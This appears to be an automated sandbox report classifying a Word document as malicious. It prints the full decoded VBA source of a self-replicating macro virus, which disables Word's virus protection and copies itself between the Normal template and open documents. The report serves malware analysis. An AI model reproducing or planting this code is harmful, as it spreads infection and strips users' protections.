Verdict: MALICIOUS
Risk Score: 80

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic)
The sample is a malicious Office document containing VBA macros. The macros appear to be designed to copy themselves between the Normal template and the active document, a technique often used for persistence or to complicate analysis. The ClamAV detection 'Doc.Trojan.Humanit-1' and the heuristic firing for VBA macros strongly indicate malicious intent, though the specific payload or ultimate goal is not directly revealed by the provided evidence.
Heuristics (2)

- ClamAV: Doc.Trojan.Humanit-1 (severity: critical, rule: CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Trojan.Humanit-1
- VBA macros detected (severity: medium, rule: OLE_VBA_MACROS). Document contains VBA macro code
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 953 bytes | c48caf3ef041a6123d823118de07c59a0466c2d6b8f604fdcb22ebcf0d0832b5 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Rem Humanitvir
cisti:
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
Set n = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set d = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
If n.Lines(4, 1) <> "cisti:" Then
Do Until n.CountOfLines = 0
n.DeleteLines 1, 1
Loop
For a = 1 To d.CountOfLines
n.InsertLines a, d.Lines(a, 1)
Next a
End If
If d.Lines(4, 1) <> "cisti:" Then
Do Until d.CountOfLines = 0
d.DeleteLines 1, 1
Loop
For a = 1 To n.CountOfLines
d.InsertLines a, n.Lines(a, 1)
Next a
End If
End Sub
```